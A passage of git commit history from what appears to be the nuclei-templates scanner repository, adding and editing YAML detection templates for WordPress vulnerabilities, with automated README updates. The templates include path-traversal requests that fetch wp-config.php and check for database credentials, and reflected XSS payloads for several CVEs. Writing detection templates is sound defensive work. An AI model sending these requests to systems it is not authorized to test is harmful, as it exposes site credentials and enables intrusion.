fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1540 files**. +**127 directories, 1541 files**. From 675fc0eabe92dab5d82904ba3a6bc8938732fd16 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 09:35:05 +0000 Subject: [PATCH 0643/4083] Auto Update README [Thu Jul 15 09:35:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index da3bc2e3f6..58bca43ce2 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 424 | vulnerabilities | 230 | exposed-panels | 200 | +| cves | 425 | vulnerabilities | 230 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1541 files**. +**127 directories, 1542 files**. From 321fcfdac18772e49e5bbef147710878d48d0e76 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:05:55 +0530 Subject: [PATCH 0644/4083] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 8bb63f3f98..e88b0cf14b 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: From ee1719ee26c086eaf80d548299dbd8437c27488b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:07:53 +0530 Subject: [PATCH 0645/4083] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index e88b0cf14b..25c8832501 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: From b5d66a191531cf93ccb2ed3141807c7649348916 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Thu, 15 Jul 2021 18:41:08 +0900 Subject: [PATCH 0646/4083] Create nativechurch-wp-theme-lfd.yaml --- nativechurch-wp-theme-lfd.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 nativechurch-wp-theme-lfd.yaml diff --git a/nativechurch-wp-theme-lfd.yaml b/nativechurch-wp-theme-lfd.yaml new file mode 100644 index 0000000000..ac62b0f0e9 --- /dev/null +++ b/nativechurch-wp-theme-lfd.yaml @@ -0,0 +1,27 @@ +id: nativechurch-wp-theme-lfd + +info: + name: WordPress NativeChurch Theme Arbitrary File Download + author: 0x_Akoko + severity: high + tags: wordpress,wp-theme,lfi + description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable. + reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From e82d39a616c33243b529ed9c26431af75d64458c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 09:42:42 +0000 Subject: [PATCH 0647/4083] Auto Update README [Thu Jul 15 09:42:42 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 58bca43ce2..71c6255158 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1542 files**. +**127 directories, 1543 files**. From bca4770d699cd9bd281452991d5968263b637ce3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:14:36 +0530 Subject: [PATCH 0648/4083] Update and rename printer-sensitiveinfo-leak.yaml to printers-info-leak.yaml --- ...nter-sensitiveinfo-leak.yaml => printers-info-leak.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename network/{printer-sensitiveinfo-leak.yaml => printers-info-leak.yaml} (75%) diff --git a/network/printer-sensitiveinfo-leak.yaml b/network/printers-info-leak.yaml similarity index 75% rename from network/printer-sensitiveinfo-leak.yaml rename to network/printers-info-leak.yaml index ba9986ed8f..280acaf662 100644 --- a/network/printer-sensitiveinfo-leak.yaml +++ b/network/printers-info-leak.yaml @@ -1,9 +1,9 @@ -id: printer-sensitiveinfo-leaks +id: printers-info-leak info: - name: unauthorized printer access + name: Unauthorized Printer Access author: pussycat0x - severity: high + severity: info tags: network,iot reference: https://book.hacktricks.xyz/pentesting/9100-pjl network: From a95133ee3d96c4f70e5e7c450b7d00cf9c9ffe11 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:16:37 +0530 Subject: [PATCH 0649/4083] Update and rename nativechurch-wp-theme-lfd.yaml to vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml --- .../wordpress/nativechurch-wp-theme-lfd.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename nativechurch-wp-theme-lfd.yaml => vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml (100%) diff --git a/nativechurch-wp-theme-lfd.yaml b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml similarity index 100% rename from nativechurch-wp-theme-lfd.yaml rename to vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index ac62b0f0e9..7695b93003 100644 --- a/nativechurch-wp-theme-lfd.yaml +++ b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml @@ -4,9 +4,9 @@ info: name: WordPress NativeChurch Theme Arbitrary File Download author: 0x_Akoko severity: high - tags: wordpress,wp-theme,lfi description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable. reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html + tags: wordpress,wp-theme,lfi requests: - method: GET From cfe930513b0ffaa5dffff793c1f7894aeb6146d6 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Thu, 15 Jul 2021 18:59:40 +0900 Subject: [PATCH 0650/4083] Create CVE-2018-9118.yaml --- CVE-2018-9118.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 CVE-2018-9118.yaml diff --git a/CVE-2018-9118.yaml b/CVE-2018-9118.yaml new file mode 100644 index 0000000000..01af711de1 --- /dev/null +++ b/CVE-2018-9118.yaml @@ -0,0 +1,27 @@ +id: cve-2018-9118 + +info: + name: WP Background Takeover, Directory Traversal <= 4.1.4 + author: 0x_Akoko + severity: high + tags: wordpress,wp-plugin,lfi + description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability + reference: https://www.exploit-db.com/exploits/44417 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 9360b48a90e53bf93a36094bbdc9ed71a08d1a1b Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 18:03:53 +0700 Subject: [PATCH 0651/4083] Create CVE-2021-24235.yaml --- cves/2021/CVE-2021-24235.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2021/CVE-2021-24235.yaml diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml new file mode 100644 index 0000000000..084545c4e4 --- /dev/null +++ b/cves/2021/CVE-2021-24235.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-24235 + +info: + name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13' + + matchers-condition: and + matchers: + - type: word + words: + - "/Onfocus=alert(123);" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6d3e02ddc17ffaf791c94dc9346499c41e191712 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 18:14:59 +0700 Subject: [PATCH 0652/4083] Create CVE-2020-17362.yaml --- cves/2020/CVE-2020-17362.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-17362.yaml diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml new file mode 100644 index 0000000000..ad58c8f0b8 --- /dev/null +++ b/cves/2020/CVE-2020-17362.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-17362 + +info: + name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 + tags: cve,cve2020,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From dc2cf528bdbcce0cf5717812c4576d3af5c6176d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 18:27:45 +0700 Subject: [PATCH 0653/4083] Create CVE-2020-12054.yaml --- cves/2020/CVE-2020-12054.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2020/CVE-2020-12054.yaml diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml new file mode 100644 index 0000000000..2010b4e99a --- /dev/null +++ b/cves/2020/CVE-2020-12054.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-12054 + +info: + name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + description: Catch Breadcrumb 1.5.4 plugin for WordPress allow Reflected XSS via a search query when used with one of the theme from the same author: Alchemist & Alchemist PRO, Izabel & Izabel PRO, Chique & Chique PRO, Clean Enterprise & Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, Higher Education PRO. + reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 + tags: cve,cve2020,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From cb364b16c5fbe629cd0bcae0709024cca6b1c270 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 18:30:38 +0700 Subject: [PATCH 0654/4083] Update CVE-2020-12054.yaml --- cves/2020/CVE-2020-12054.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index 2010b4e99a..8e30740a3a 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -4,7 +4,6 @@ info: name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS author: daffainfo severity: medium - description: Catch Breadcrumb 1.5.4 plugin for WordPress allow Reflected XSS via a search query when used with one of the theme from the same author: Alchemist & Alchemist PRO, Izabel & Izabel PRO, Chique & Chique PRO, Clean Enterprise & Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, Higher Education PRO. reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 tags: cve,cve2020,wordpress,xss,wp-plugin From f816c58bac51f17c530f33aa5432434b00aa93d2 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 18:40:17 +0700 Subject: [PATCH 0655/4083] Create CVE-2019-19134.yaml --- cves/2019/CVE-2019-19134.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-19134.yaml diff --git a/cves/2019/CVE-2019-19134.yaml b/cves/2019/CVE-2019-19134.yaml new file mode 100644 index 0000000000..68322a934a --- /dev/null +++ b/cves/2019/CVE-2019-19134.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-19134 + +info: + name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E' + + matchers-condition: and + matchers: + - type: word + words: + - 'foo">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 93293c986a2da2cefb2c4403148ecedbad12df6b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 17:22:49 +0530 Subject: [PATCH 0656/4083] Update CVE-2020-17362.yaml --- cves/2020/CVE-2020-17362.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index ad58c8f0b8..2e265da33c 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -4,6 +4,7 @@ info: name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 tags: cve,cve2020,wordpress,xss,wp-plugin From 89112a18d6e5ec0a04f45fb80489b34f646aa67a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 17:25:22 +0530 Subject: [PATCH 0657/4083] Update CVE-2020-12054.yaml --- cves/2020/CVE-2020-12054.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index 8e30740a3a..e937c8a86e 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -4,6 +4,7 @@ info: name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS author: daffainfo severity: medium + description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query). reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 tags: cve,cve2020,wordpress,xss,wp-plugin From 1017dfba60f858dee4d882ba83e69e5214d93168 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 11:56:05 +0000 Subject: [PATCH 0658/4083] Auto Update README [Thu Jul 15 11:56:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 71c6255158..517d3022ea 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 425 | vulnerabilities | 230 | exposed-panels | 200 | +| cves | 426 | vulnerabilities | 230 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1543 files**. +**127 directories, 1544 files**. From 22a16b4b17f2e64d5c3022b0f45855542ab71c09 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 17:26:55 +0530 Subject: [PATCH 0659/4083] Update CVE-2019-19134.yaml --- cves/2019/CVE-2019-19134.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-19134.yaml b/cves/2019/CVE-2019-19134.yaml index 68322a934a..5aeed95083 100644 --- a/cves/2019/CVE-2019-19134.yaml +++ b/cves/2019/CVE-2019-19134.yaml @@ -4,6 +4,7 @@ info: name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 tags: cve,cve2019,wordpress,xss,wp-plugin From 46e63c49f8a7cc5dec1934263079f586b41c7ab4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 11:57:22 +0000 Subject: [PATCH 0660/4083] Auto Update README [Thu Jul 15 11:57:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 517d3022ea..c00d90be58 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 426 | vulnerabilities | 230 | exposed-panels | 200 | +| cves | 427 | vulnerabilities | 230 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1544 files**. +**127 directories, 1545 files**. From 74b9c0e66c089d6acc13b5cc082109d0f6885421 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 12:00:46 +0000 Subject: [PATCH 0661/4083] Auto Update README [Thu Jul 15 12:00:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c00d90be58..a710843741 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 427 | vulnerabilities | 230 | exposed-panels | 200 | +| cves | 428 | vulnerabilities | 230 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1545 files**. +**127 directories, 1546 files**. From 42fd30dfd8af121a6f70efdb3c91921f2139cd15 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 17:40:37 +0530 Subject: [PATCH 0662/4083] Update and rename CVE-2018-9118.yaml to cves/2018/CVE-2018-9118.yaml --- CVE-2018-9118.yaml => cves/2018/CVE-2018-9118.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) rename CVE-2018-9118.yaml => cves/2018/CVE-2018-9118.yaml (85%) diff --git a/CVE-2018-9118.yaml b/cves/2018/CVE-2018-9118.yaml similarity index 85% rename from CVE-2018-9118.yaml rename to cves/2018/CVE-2018-9118.yaml index 01af711de1..43b688e0dc 100644 --- a/CVE-2018-9118.yaml +++ b/cves/2018/CVE-2018-9118.yaml @@ -4,9 +4,9 @@ info: name: WP Background Takeover, Directory Traversal <= 4.1.4 author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability reference: https://www.exploit-db.com/exploits/44417 + tags: wordpress,wp-plugin,lfi,cve,cve2018 requests: - method: GET @@ -19,9 +19,7 @@ requests: words: - "DB_NAME" - "DB_PASSWORD" + - "DB_HOST" + - "The base configurations of the WordPress" part: body condition: and - - - type: status - status: - - 200 From f13d61c128b947633113367063bb940b0dbab39b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 17:41:16 +0530 Subject: [PATCH 0663/4083] Update CVE-2018-9118.yaml --- cves/2018/CVE-2018-9118.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-9118.yaml b/cves/2018/CVE-2018-9118.yaml index 43b688e0dc..13722267ef 100644 --- a/cves/2018/CVE-2018-9118.yaml +++ b/cves/2018/CVE-2018-9118.yaml @@ -1,4 +1,4 @@ -id: cve-2018-9118 +id: CVE-2018-9118 info: name: WP Background Takeover, Directory Traversal <= 4.1.4 From 449593d0976c4df5cff8ea7d595353335e76520c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 12:12:57 +0000 Subject: [PATCH 0664/4083] Auto Update README [Thu Jul 15 12:12:57 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a710843741..d443261fd2 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 428 | vulnerabilities | 230 | exposed-panels | 200 | +| cves | 429 | vulnerabilities | 230 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1546 files**. +**127 directories, 1547 files**. From ba64446d08584b5b3fe16495c335986c41d83a5a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 17:43:45 +0530 Subject: [PATCH 0665/4083] Update nativechurch-wp-theme-lfd.yaml --- vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index 7695b93003..eba8ffcbf7 100644 --- a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml +++ b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml @@ -19,9 +19,7 @@ requests: words: - "DB_NAME" - "DB_PASSWORD" + - "DB_HOST" + - "The base configurations of the WordPress" part: body condition: and - - - type: status - status: - - 200 From d02dd83df51598fa921e7b54e7b68c74c6e0933f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 12:15:35 +0000 Subject: [PATCH 0666/4083] Auto Update README [Thu Jul 15 12:15:35 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d443261fd2..d57424f589 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 429 | vulnerabilities | 230 | exposed-panels | 200 | +| cves | 429 | vulnerabilities | 231 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1547 files**. +**127 directories, 1548 files**. From 1f37dc3d712887985ed9dc2c11f0fe08ccfc2f7f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 12:16:09 +0000 Subject: [PATCH 0667/4083] Auto Update README [Thu Jul 15 12:16:09 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d57424f589..ba1aca231a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 429 | vulnerabilities | 231 | exposed-panels | 200 | +| cves | 430 | vulnerabilities | 231 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1548 files**. +**127 directories, 1549 files**. From 8a28dc19356679e00bd410e4db4650c1cb180d9e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 19:30:44 +0700 Subject: [PATCH 0668/4083] Create 